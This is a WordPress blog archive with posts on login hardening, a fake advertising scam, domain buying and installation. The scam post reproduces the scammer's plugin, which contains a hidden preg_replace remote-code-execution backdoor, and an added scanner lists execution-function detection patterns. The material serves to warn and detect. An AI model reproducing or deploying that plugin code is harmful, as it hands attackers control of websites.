Tag Archives: WordPress

Secure WordPress Login



Since the default WordPress username is ‘admin’, did you ever think that maybe it’s time to change it to something a bit more secure? Any hacker worth her or his salt can probably gain access to your WordPress installation quite easily. If you have left the default WordPress username as admin, half of the login is already known, and the only thing they need is a password-guessing tool of some type.

Besides changing the default setting, you should also do something else. If you are a single owner/poster, you should change your posting name to something other than your username. If you want to post as “Jane”, for instance, you can log in as kentucky or anything else that suits you. Why should you do this? It seems obvious but in case you missed it, if you post as “Jane” and your username for logging in is “jane”, a hacker could easily guess your username. Simple, right?

Head over to ‘Users’ on the left side of your WordPress Dashboard. For the default installation, there will only be one Username, by default it is ‘admin’. Here’s what the default setting looks like:

Admin user settings
Admin is the default user. No 'Role' is listed as there is only one user.

The default username can’t be changed but what you want to do is to add another user then switch the Role of Admin to ‘no role’. In other words you can’t get rid of the admin user but you can take the administrative power away from them in order to secure your WordPress site. You’ll notice from the photo above that there is no place to choose the Role of this user.

Update: I forgot to mention that you can’t change the default username’s role until you set up a new user as an administrator, log out and log back in again. Set up the new user, make that user an administrator, log out, then log in again and change the default admin’s role to ‘no role’.

Tip: You can’t change the role of the current administrator until you have another administrator lined up. Create another user, use whatever name and nickname you want, then make the Role of that new user ‘Administrator’. Once you do that, go back to the original admin user and define its Role as ‘None’. This screen shows you what to look for:

New User Menu for WordPress
This is where you can choose the Role for the new user.

In this window, make note of two things. First, the Role menu is visible since you are adding a new user. Any new user must have a role, even if it is no role at all. Next, make sure the username and the display name are totally different. The Username is the name you use to log in to the site. The Display name is the name that shows on each of your posts. Make sure they are different. Anyone can try to log in with your display name and guess your password, but if your username is different, your site is more secure.

TIP: Whatever your role is on any WordPress site, make sure that your username for logging in isn’t the same as your posting name. If you’re an administrator, make sure of this small but very important detail for every user of your WordPress installation.

Once you have a second administrator set up, go back and remove the administrator role from the default admin username. Once you do that, your WordPress site is a lot more secure than it used to be.

Thanks for reading!



WordPress Scam


There is a WordPress advertising scam going around now. Here are the details of it. If you own a WordPress site, this is important reading. Please try to follow the whole post to the end.

1. The first contact is through a comment on your site. This is the comment, details may change somewhat:

“Hi,
Sorry I write you via comments. But I could not find contact e-mail or feedback form on your site.
We are looking for new advertisement platforms and we are interested in your site http://www.kitchenrenovation411.com.
Is it possible to place banner on your site on a fee basis?
Please, contact us at e-mail.
Best regards,
Mathis Gaillard.
site: http://www.izidaagency.com
e-mail: mgaillard @izidaagency.com
phone: + (0)9 78 62 91 00


2. Once you email the person, this is the reply:

> From: mgaillard@izidaagency.com
> To: my email
> Subject: Re: re: kitchenrenovation411.com
> Date: Thu, 10 Nov 2011 02:39:40 -0800
>
> Hello,
>
> Thanks for reply to our proposal!
>
> I represent Izida Agency. At the moment we are preparing an advertising campaign for Lacoste Company (it is a French company producing clothes, footwear, perfumery etc.) We already have designed banners for the campaign, they are the following sizes: 160×600, 240×400, 300×250, 336×280, 468×60, 728×90.
> What can be your price for one banner (banner should appear at ALL pages of your site) of abovementioned sizes (please specify the place for the banner – top, bottom, left, right)? Please mention a normal link for banner, without javascript code and set prices in US dollars per month.
> Here you can see our banners: http://docs.izidaagency.com/lacoste/?view=1
>
> Best regards,
> Mathis Gaillard.
> site: www.izidaagency.com
> e-mail: mgaillard@izidaagency.com
> phone: + (0)9 78 62 91 00

3. After some questioning on my part, I received this email:

Hi!
Before placing banner, your site need to be approved by the advertiser.
If you agree with it we'll send you special plugin, that
lets advertiser check your site and decide if it fits his requirements.

Best regards, 
Mathis Gaillard.
site: www.izidaagency.com
e-mail: mgaillard@izidaagency.com
phone: + (0)9 78 62 91 00

4. Finally, I get this email, complete with a password:

Hi!

Thanks for reply to our proposal!

We like your price.

To pass to the banner control system follow the link http://webmaster.izidaagency.com

To enter use the following data:

login: my other site
password: email me for password

You should install and activate the plugin in order to display advertisement.

Before making payment, advertiser must approve location of the banner.

The banner will be shown on your site when you add special code to your web address
(for example: http://www.my other site.com/?adv_test=1).

It means, that visitors will see the banner only if it is approved and payment made.

To get installation instruction for your site type pass to: http://docs.izidaagency.com/wp_install

To activate your site you have to enter the code: GQP-HFA-55H

What way of payment is suitable for you?

Best regards,
Mathis Gaillard.
site: www.izidaagency.com
e-mail: mgaillard@izidaagency.com
phone: + (0)9 78 62 91 00

5. OK, now I have the code. What do I do with it? The file that I downloaded is a php script that I am supposed to upload to my WordPress site. Here is the actual code that was sent:

_____________________________________________________________________________________________

<?php

/*
  Plugin Name: ADV
  Description: ADV Plugin
  Version: 2.6.1
 */

class AdvWidget extends WP_Widget {

    function AdvWidget() {
        parent::WP_Widget(false, $name = 'AdvWidget');
    }

    /** @see WP_Widget::widget */
    function widget($args, $instance) {
        if (get_option('adv_place') == 'widget')
            advShowBanner();
    }

    /** @see WP_Widget::update */
    function update($new_instance, $old_instance) {
        $instance = $old_instance;
        $instance['title'] = strip_tags($new_instance['title']);
        return $instance;
    }

    function form($instance) {

    }

}

add_action('widgets_init', create_function('', 'return register_widget("AdvWidget");'));

add_action('admin_menu', 'advPluginMenu');

register_activation_hook(__FILE__, 'advActivation');

define('ADV_SERVICE_DOMAIN', 'izidaagency.com');
define('ADV_SERVICE_URL', 'http://webmaster.' . ADV_SERVICE_DOMAIN . '/key');

function advReadUrl($url) {
    if (function_exists('curl_init')) {
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_URL, $url);
        $result = curl_exec($curl);
        curl_close($curl);
        return $result;
    } else
        return file_get_contents($url);
}

function advActivation() {
    update_option('adv_place', 'widget');
}

register_deactivation_hook(__FILE__, 'advDeactivation');

function advDeactivation() {
    delete_option('adv_key');
}

function advPluginMenu() {
    add_options_page('ADV Plugin Options', 'ADV', 'manage_options', 'adv-identifier', 'advPluginOptions');
}

function adv_show_banner() {
    advShowBanner();
}

function advShowBanner() {
    $advBanner = get_option('adv_banner');
    $advMode = get_option('adv_mode');
    if ($advBanner) {
        if (isset($_REQUEST['adv_test']) || $advMode == 'work') {
            echo "<img src='" . get_option('siteurl') . "/adv_banners/" . $advBanner . "'/>";
        }
    }
}

function activateCode() {
    $data = advReadUrl(ADV_SERVICE_URL . "?action=init&key=" . $_REQUEST['key'] . "&domain=" . urldecode($_SERVER['HTTP_HOST']));
    if (strpos($data, '<key>true</key>') !== FALSE) {
        preg_match("#<width>(.+?)</width>#", $data, $arr);
        update_option('adv_width', $arr[1]);
        preg_match("#<height>(.+?)</height>#", $data, $arr);
        update_option('adv_height', $arr[1]);
        echo '<div id="message"><p>The code is activated successfully.</p></div>';
        update_option('adv_key', $_REQUEST['key']);
        downloadBanners();
    } else {
        echo '<div id="message"><p>Code activation error.</p></div>';
    }
}

function downloadBanners() {
    $bannersDir = ABSPATH . "/adv_banners";
    if (!is_dir($bannersDir)) {
        mkdir($bannersDir);
    }
    $list = advReadUrl(ADV_SERVICE_URL . "?action=getBannerList&key=" . get_option("adv_key"));
    preg_match_all("|<banner_item>(.+?)</banner_item>|", $list, $banners);
    preg_match("|<adv>(.+?)</adv>|", $list, $adv);
    preg_match("|<show_banner>(.+?)</show_banner>|", $list, $showBanner);
    preg_match("|<mode>(.+?)</mode>|", $list, $mode);
    if (is_array($banners[1]) && isset($adv[1]) && isset($showBanner[1]) && isset($mode[1])) {
        update_option("adv_banner", $showBanner[1]);
        update_option('adv_mode', $mode[1]);
        foreach ($banners[1] as $banner) {
            $advBannerDir = $bannersDir . "/" . $adv[1];
            if (!is_dir($advBannerDir))
                mkdir($advBannerDir);
            $arr = explode("/", $banner);
            if (count($arr) == 2) {
                $size = $arr[0];
                $bfile = $arr[1];
                if (!is_dir($advBannerDir . "/" . $size))
                    mkdir($advBannerDir . "/" . $size);
                file_put_contents($advBannerDir . "/" . $size . "/" . $bfile, advReadUrl('http://docs.' . ADV_SERVICE_DOMAIN . '/' . $adv[1] . '/' . $banner));
            }
        }
        echo '<div id="message"><p>Banners are downloaded successfully.</p></div>';
    }
}

if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv']))
    $r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']), str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6');

function advPluginOptions() {
    if (!current_user_can('manage_options')) {
        wp_die(__('You do not have sufficient permissions to access this page.'));
    }
    $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';
    if ($action == 'downloadBanners') {
        downloadBanners();
    } elseif ($action == 'setPlace') {
        update_option('adv_place', $_REQUEST['adv_place']);
    } elseif ($action == 'saveKey') {
        activateCode();
    }

    $advPlace = get_option('adv_place');
    echo '<div>';

    echo '<h2>ADV</h2>';
    echo '<form method="post" action="options-general.php?page=adv-identifier&action=setPlace"><select name="adv_place">';
    echo '<option value="none" ' . ($advPlace == 'none' ? 'selected' : '') . '>Don\'t show the banner.</option>';
    echo '<option value="widget" ' . ($advPlace == 'widget' ? 'selected' : '') . '>Show the banner as a Widget.</option>';
    echo '<option value="template" ' . ($advPlace == 'template' ? 'selected' : '') . '>Template usage: adv_show_banner();</option>';
    echo '</select>';
    echo '<input type="submit" value="Save"/></form>';
    echo '<div>';
    if (get_option('adv_key') === FALSE) {
        echo '<h2>Activation Code</h2>';
        echo '<form method="post" action="?page=adv-identifier&action=saveKey">';
        echo '<input type="text" name="key"/>';
        echo '<input type="submit" value="Activate"/>';
        echo '</form>';
    } else {
        $mode = get_option('adv_mode');
        echo '<br/>Code: ' . get_option('adv_key');
        echo '; <a href=\'options-general.php?page=adv-identifier&action=downloadBanners\'>Download banners.</a><br/>';
        echo 'Mode: ' . $mode;
        if ($mode != 'work') {
            $url = get_option('siteurl') . "/?adv_test=1";
            $link = "<a href='$url'>$url</a>";
            echo '<br/></br>The banner will appear on your site only after your site is approved by the advertiser and you get the payment.
To see where the banner will be placed on your site, use the special feature in the site address: ' . $link;
        }
    }
    echo '</div>';
    echo '</div>';
}
?>

_____________________________________________________________________________
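A quick way to triage a plugin like the one above before it ever reaches a site is to scan its source for the handful of constructs that should never appear in an advertising widget. The scanner below is an added example, not part of the post and not a product; the indicator list is a set of heuristics chosen for this example, not a complete signature set. Its constructed sample input mirrors the structure of the script above with placeholder hostnames. Two of the indicators are worth spelling out: the block that reads `$_POST['cadv']` and `$_POST['gadv']` sits at file scope, so it runs on every page load for any visitor with no capability check at all, and it feeds request data straight into `preg_replace()` as the pattern and replacement, which on PHP 5 (current when this was written) executes the replacement as PHP whenever the pattern carries the `/e` modifier.

```python
import re

# Line-level indicators a reviewer checks in a third-party plugin before installing it.
# These are heuristics written for this example, not a complete malware signature set.
INDICATORS = [
    (
        "request-controlled-regex",
        re.compile(r"preg_replace\s*\(.*\$_(?:POST|GET|REQUEST)\b"),
        "regex pattern or replacement comes straight from the HTTP request; on PHP 5 "
        "a pattern carrying the /e modifier makes preg_replace() run the replacement as PHP",
    ),
    (
        "create_function",
        re.compile(r"\bcreate_function\s*\("),
        "create_function() compiles a string into code at runtime",
    ),
    (
        "remote-to-disk",
        re.compile(r"file_put_contents\s*\(.*https?://"),
        "content fetched from a remote URL is written into the web root",
    ),
    (
        "code-execution",
        re.compile(r"\b(?:eval|system|exec|shell_exec|passthru)\s*\("),
        "direct code or shell execution",
    ),
]

SUPERGLOBAL = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b")


def scan_php(source):
    """Return (line_number, indicator, explanation) for every suspicious line.

    Brace depth is tracked crudely (one count per line) to spot request handling at
    file scope, which runs on every page load for any visitor, before any
    current_user_can() check a settings page might perform.
    """
    findings = []
    depth = 0
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern, why in INDICATORS:
            if pattern.search(line):
                findings.append((lineno, name, why))
        if depth == 0 and SUPERGLOBAL.search(line):
            findings.append((lineno, "top-level-request-handler",
                             "reads request data at file scope, outside any function or capability check"))
        depth = max(0, depth + line.count("{") - line.count("}"))
    return findings


# Constructed sample modelled on the structure of the script above; hostnames are placeholders.
SAMPLE_PLUGIN = r'''<?php
define('ADV_SERVICE_URL', 'http://webmaster.example.invalid/key');
add_action('widgets_init', create_function('', 'return register_widget("AdvWidget");'));
function activateCode() {
    $data = advReadUrl(ADV_SERVICE_URL . "?action=init&key=" . $_REQUEST['key']);
}
function downloadBanners() {
    file_put_contents($dir . "/" . $bfile, advReadUrl('http://docs.example.invalid/' . $banner));
}
if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv']))
    $r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']), str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6');
function advPluginOptions() {
    if (!current_user_can('manage_options')) { wp_die('no'); }
}
'''

if __name__ == "__main__":
    for lineno, name, why in scan_php(SAMPLE_PLUGIN):
        print(f"line {lineno}: {name}: {why}")
```

Run it as a script to see the report for the sample, or call `scan_php(open("plugin.php").read())` on a file you have been sent. The brace counter is deliberately simple (it does not parse strings or comments), so treat a "top-level-request-handler" hit as a prompt to read that part of the file, not as proof on its own; the "request-controlled-regex" hit, on the other hand, is reason enough not to install the plugin.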

This isn’t a new scam. It’s been around for a few months or longer. Here is a link to another page which explains the same thing but from a different contact person:

http://keepsafeonthenet.co.uk/2011/07/martin-dumont/comment-page-1/#comment-87860


My comments are at the bottom of that page.

I have my feelers out now to see what this script does. There is a chance that it’s a trojan of some kind and it may not even be active after it’s installed. I can only assume that it will, at a future date, provide access to a WordPress site. If anyone can decipher the script, please do so and contact me using the comment section below.

I should say that the site this comment was on is a new site, very small with very little traffic. I have tried to contact Izod Lacoste but, so far, they have not emailed me back. If you have been affected by this scam, please comment below. The more we know about this, the safer the WordPress community will be.

Thanks for reading!


WordPress Comment Scam

Update: This scammer is using different names. The names used that I know of are: Rayan Meyer, Killian Blanchard, Mathis Gaillard, among many others. Please read this post to understand the modus operandi and then go to the site mentioned below for even more details. Good luck!

Scams are everywhere, it seems. Yesterday I received a comment on one of my other websites. The commenter asked if I was interested in placing a banner ad (from a major company) on the site. The person apologized for making a comment instead of emailing. I realized that I didn’t have an email address on the site and this made his comment sound legitimate.


Now my site isn’t as popular as this one. It’s about kitchens, kitchenrenovation411.com, and probably isn’t a site that an advertiser would pick for a banner ad. This alone should have tipped me off that this was a scam. However, the company that this person was supposedly going to link to the banner is a very reputable company. Maybe the clientèle from my site fit the demographics they were looking for. Hey, it’s money, right?

I emailed the person and quoted a figure then did some heavy research. It seems that this kind of thing has been going on for quite a while. Here is a site that describes the dilemma that many WordPress bloggers find themselves in and the tricks scammers use to gain access to websites: http://keepsafeonthenet.co.uk/2011/07/martin-dumont/comment-page-1/#comment-87842

Here are some tips to avoid losing your website to a scammer:

1. If it sounds too good to be true, it almost certainly is. Whenever money is involved, our eyes light up and we start planning for the future. That’s human nature. Most WordPress sites don’t make any money at all. If someone contacts you about a site that isn’t very popular, you know it is a scam.

2. Do your research. Search Google using the complete email or comment on your blog. This will almost certainly lead to a forum or another site that the scammer has contacted. Read what has been posted and confirm that your contact is fake.

3. Advertisers don’t send their advertising code in a zip file. If you get a zip file from someone who has contacted you through your website, you know it’s got a trojan in it. The contact that I am writing about insists that they will not use any JavaScript code, simply a link to the website of the advertiser. Baloney! There will be a zip file coming, I can guarantee it.

4. Brand name companies don’t work through small advertising companies. The website of the person who contacted me looks very professional but it hasn’t been updated since 2007. The website is also exactly the same as another company listed in the link above. Both sites are identical, the only difference is the person who is sending out the emails.

5. If you’ve been taken in by this kind of scam, you should consider your website to be compromised. Links will likely take users to other sites or, worse, your site may be used to send spam. Work with your hosting company to rid your site of the malware on it.

Hopefully this post will help you avoid this type of unusual scam. This kind of thing is criminal activity and should be considered as a threat to your site as well as to your hosting company. Once this kind of thing is on a server, there are many ways for it to spread. Hopefully your host can stay on top of it.

Thanks for reading.



Buy Your Own Domain



Buying a domain (that’s a .com name, if you don’t know) is cheap, fast and fun. Even if you don’t know a thing about HTML or WordPress, if you’ve got a catchy name, why not register it? Sure, there are millions of domains that have been registered already, this doesn’t mean you should give up. Some people go as far as to snap up domains, locking them up before anyone else gets them. Personally, this doesn’t make a lot of sense but everyone is different. I guess if you’ve got money to tie up, maybe it makes sense.

Buying a domain means that you have it for a one year term. Many discount hosting companies offer significant discounts if you sign up for a two year or longer term. Many also give you discounts if you buy multiple domains at a time.

Right now, I would stick to the old .com domain if you’re going to try and make some money from it. People know .com, they assume that every site is a .com site and immediately head to whatever.com, even if the site is whatever.org.

In fact, when you are signing up for your domain with most companies, they will offer you all of the various combinations of your domain at the same time. Want whatever.com? How about getting whatever.org or whatever.net at the same time? The point of this, of course, is to guard against someone else stealing traffic away from your catchy name. Think of it. If you could snag google.org or google.info, you would. You’d be crazy not to.

Once you have your domain, think about doing something with it. As you might have read in past posts, I use WordPress on all of my sites. You can read about installing WordPress here and about how to set up your domain hosting here. Anything you want to know about installation and hosting is on this site, just search for the answers if you’re stuck. If I can do it, you probably can too.

Thanks for reading!



Installing WordPress – October 28, 2011



Now we’re finally ready to install WordPress. We’ve got our domain name and hosting here. We set our nameservers here. Over here, we created a database and named it. OK, looks like we’re set.

1. Download WordPress.

2. Unzip it then copy and paste the WordPress folder on to your desktop. (Put it anywhere you want but putting it on the desktop is easier for beginners.)

3. Listen carefully to this part. First you have the zip file to unzip. Inside that is a WordPress 3.x folder (depending on which version is out now). Inside that folder is a WordPress folder (just that, no number). Inside that folder are ALL the files you need to upload to the folder in your hosting account. Don’t upload the WordPress folder, just the folders and files inside the WordPress folder. Get it? Those files look like this:

Inside the WordPress Folder.
From WP-Admin to xmlrpc.php, these are the files you need.

4. Open your FTP program (I recommend FileZilla). On the left side of the window, navigate to your Desktop then to the folder that contains the WordPress files as shown above. Connect to your host using your username and password, then navigate to the folder where you want to put your files. This is the folder that is inside your root directory, right? It should be the only folder in your root directory. It should also be empty, except for the placeholder file (index.html) that we created here.

5. In the WordPress folder on the left, click on WP-Admin (the folder at the top), scroll down to the bottom, hold down the shift key and click on xmlrpc.php. All of the files and folders in that WordPress folder will now be highlighted. Right click in the blue area and choose Upload. Depending on your FTP program and upload speed, this last step might take a bit of time, maybe 5 minutes or less.

6. Wait until FileZilla finishes (no more queued files). You should now have a full selection of files on the right hand side from WP-Admin to xmlrpc.php. The next step can be done in FileZilla but I prefer to do it in the File Manager on my hosting site. Do what you feel better with here.

7. You are about to edit one file. If you make a mistake, it’s not a big deal so don’t get your knickers in a knot. All that will happen is that WordPress won’t be able to install itself…yet. Even if you really screw things up, you can always delete everything inside your host folder and start over again. Relax, OK?

You are looking for the wp-config-sample.php file. This file is the one that tells WordPress what database you are using, what the password is and who the user is for that database. Remember when we did all of that here?

8. Find the wp-config-sample.php file and click on it once. On the right side of the window you will see three icons. The one you want is the ‘edit’ icon. Click it and a small window will open up or you will be taken to another page, depending on which hosting interface your host uses. Once you see inside that file, it’s full of simple text that looks really complicated, look for this section:

_______________________________

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'database_name_here');

/** MySQL database username */
define('DB_USER', 'username_here');

/** MySQL database password */
define('DB_PASSWORD', 'password_here');
____________________________________________


9. Enter the database name, username and password of the MySQL database that we made earlier. Leave the apostrophes in, just type in the database name, user and password like this:

_______________________________

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'sitedatabase1');

/** MySQL database username */
define('DB_USER', 'joeschmoo');

/** MySQL database password */
define('DB_PASSWORD', 'goodpassword');
____________________________________________

10. In another browser window, paste this URL (taken from the wp-config-sample.php file): https://api.wordpress.org/secret-key/1.1/salt/

You will see a simple page that has information like this on it:

_______________________________________________

define('AUTH_KEY',         'G;^s;iqRh${ovHzc&n9s31-i2*U DkHI9u]#jWt&nPByL`e)cw7Zz9TJ|.c7Hu1f');
define('SECURE_AUTH_KEY',  'a|Bx@bXxFL@)1$0t]MyEvg1nt=aagDu%E9S9V>WZ<:as#)2pbY@Dv6xJv.`A>GM&');
define('LOGGED_IN_KEY',    'jFHyxThnTAu_Nxk(iHDj,|VwOQ@$V^Je: bO&c$&-IX)IGp[#Jr&F$rv9X98[dqs');
define('NONCE_KEY',        'n1P/X(*Y|ta#f1lde(gj!}L{r1{^Mu--v`fJ32)a-N1.S _4j*WBy/4!w+SvrNS-');
define('AUTH_SALT',        ')TgQ&Uj0QH?AP*+UCu]>{3{w5*(+-tL|U&]*)MhEP@YG|/dqFMVDK=-a!22&zWg+');
define('SECURE_AUTH_SALT', 'R]m:Fm*gO%Vmi^HL+_GQmd-h_,~u k,=%j^5q]b8m3[|?N[ksmfm=s%=oM]1gb1.');
define('LOGGED_IN_SALT',   'F.}Du-=]$|GBm|5tNH|haDASOu`=-Cv<RS2hKV].cNS+ex=-dX zlN6}ql)$sNz:');
define('NONCE_SALT',       '!?i5/5mjG;Fz%WxLNQEg~~+5nJiMY0yAo~T6Om%<_$&ae:{f(~Y2a}G8vQ/*&>x|');

11. Copy that information (from the word define until the last semi-colon, exactly as is shown above). Don’t use the data shown here, get your own for security’s sake.

12. In the wp-config-sample.php file, find the EXACT section that corresponds to the information on the webpage you just opened. Highlight everything from the word define down to the last semi-colon. Once that is highlighted, either right click and choose ‘paste’ or hit control and v at the same time. Either way, the info from the webpage is pasted into the file you are editing.

13. This is important, read this carefully. Just below the section we just worked on, you’ll see the section for the ‘WordPress Database Table prefix’. Locate it and find the section that reads:

_____________________________________

$table_prefix  = 'wp_';

____________________________________

14. Change the part between the apostrophes to some combination of numbers, letters and underscores. It will look something like this after you’re done:

______________________________________

$table_prefix  = 'new_site143uty';

______________________________________

This is an important step which adds to the security of your WordPress installation. You don’t need this information but you can write it down anyway. WordPress uses it, not you.

15. Last step, usually only needed if the current settings don’t work. Farther up from where we are, you will see a section (under the section where you put the database password) that reads:

_____________________________________________

/** MySQL hostname */
define('DB_HOST', 'localhost');

_____________________________________________

Most of the time, ‘localhost’ works just fine. If it doesn’t or if you just want to be sure, you’ll have to enter the hostname of the MySQL server that you are using. Save the file you are editing. Head back to the control panel and go into the MySQL databases again. Click on the database that you created and somewhere there will be a ‘generate code’ button. What you are looking for is ‘your server name’. This will be something that looks like a domain name: accountname.hostmysql.com. Copy this and head back to the wp-config-sample.php file, open it for editing, highlight the word localhost and paste the new hostname into that space. It will look like this:

____________________________________________

/** MySQL hostname */
define('DB_HOST', 'accountname.hostmysql.com');

____________________________________________

At this point, save the file and stretch a bit, grab a coffee or something and smile because you’re almost done. The hard part is over. It’s all fun from now on.
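Steps 9 through 15 all edit the same stretch of the config file, and every one of them is a place to slip a stray quote or an illegal character into a PHP string. The script below is an added example, not part of the post and not WordPress code, that produces that whole stretch in one go from the values you collected: it quotes the database settings, generates the eight keys locally with Python’s `secrets` module (a substitute for copying them from api.wordpress.org in step 10; both give you 64-character random keys), and refuses a table prefix that WordPress would reject, since WordPress only allows letters, numbers and underscores there. The database name, user, password, host and prefix from the post are reused as constructed inputs; the key alphabet is an assumption chosen to avoid characters that break a single-quoted PHP string.

```python
import re
import secrets
import string

KEY_NAMES = [
    "AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
    "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT",
]

# Printable ASCII minus the three characters that would break a single-quoted PHP
# string (quote, double quote, backslash) and the space. Assumed for this example.
KEY_ALPHABET = "".join(
    c for c in string.printable if c.isprintable() and c not in "'\"\\ "
)


def generate_key(length=64):
    """One 64-character key from the OS CSPRNG, same length as the api.wordpress.org keys."""
    return "".join(secrets.choice(KEY_ALPHABET) for _ in range(length))


def valid_table_prefix(prefix):
    """WordPress accepts only letters, digits and underscores, and not an empty prefix."""
    return re.fullmatch(r"[A-Za-z0-9_]+", prefix) is not None


def php_single_quoted(value):
    """Quote a value for define('X', '...'); reject characters that would need escaping."""
    if "'" in value or "\\" in value:
        raise ValueError("value must not contain a single quote or backslash")
    return f"'{value}'"


def render_wp_config_fragment(db_name, db_user, db_password, db_host="localhost",
                              table_prefix="wp_", keys=None):
    """Return the edited section of wp-config-sample.php as text."""
    if not valid_table_prefix(table_prefix):
        raise ValueError("table prefix may contain only letters, numbers and underscores")
    keys = keys if keys is not None else {name: generate_key() for name in KEY_NAMES}
    width = len("define('SECURE_AUTH_SALT',") + 1   # column where api.wordpress.org aligns values
    lines = [
        "// ** MySQL settings - You can get this info from your web host ** //",
        "/** The name of the database for WordPress */",
        f"define('DB_NAME', {php_single_quoted(db_name)});",
        "",
        "/** MySQL database username */",
        f"define('DB_USER', {php_single_quoted(db_user)});",
        "",
        "/** MySQL database password */",
        f"define('DB_PASSWORD', {php_single_quoted(db_password)});",
        "",
        "/** MySQL hostname */",
        f"define('DB_HOST', {php_single_quoted(db_host)});",
        "",
    ]
    lines += [f"define('{name}',".ljust(width) + f"{php_single_quoted(keys[name])});"
              for name in KEY_NAMES]
    lines += ["", f"$table_prefix = '{table_prefix}';"]
    return "\n".join(lines)


def extract_defines(fragment):
    """Parse define('NAME', 'value'); lines back into a dict, for checking the result."""
    return dict(re.findall(r"define\('([A-Z_]+)',\s*'([^']*)'\);", fragment))


if __name__ == "__main__":
    print(render_wp_config_fragment("sitedatabase1", "joeschmoo", "goodpassword",
                                    db_host="accountname.hostmysql.com",
                                    table_prefix="new_site143uty"))
```

Run it and paste the printed block over the matching section of the sample file. One thing to keep in mind while doing that: WordPress reads its settings from wp-config.php; wp-config-sample.php is the template you copy it from.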

16. In your host’s File Manager, look up at the top of the right hand side till you find the Wp-Admin folder. Open it and look for the install.php file. Click on it then choose ‘preview’ on the right. A webpage will open up. If you’ve done everything correctly, you can install WordPress from this page. Click OK and create a username (don’t use admin, choose something different), take the standard password that WordPress creates for you, enter your email (make sure it’s correct since there is no way to recover your password if you put in the wrong email here) then click OK.

17. Here, I do two things. I take a screen capture of the page to ensure that I have the password and username correct, then I copy and paste the password into a text file for safekeeping. OK, I write it out in a book, too.

18. Once you’ve done all of this, log in to WordPress and start creating.

These are the steps as I do them for each installation of WordPress that I’ve done. In case you are wondering, I’ve done this about twenty-four times. I hope this sounds simple and that it’s all clear to you. Most of the information here is explained in the WordPress installation area but some of it is from trial and error. One of my hosts was fine with ‘localhost’ for the database host but my current host wasn’t. I hope it works for you.

Thanks for reading! Follow me on Twitter: @_BrianMahoney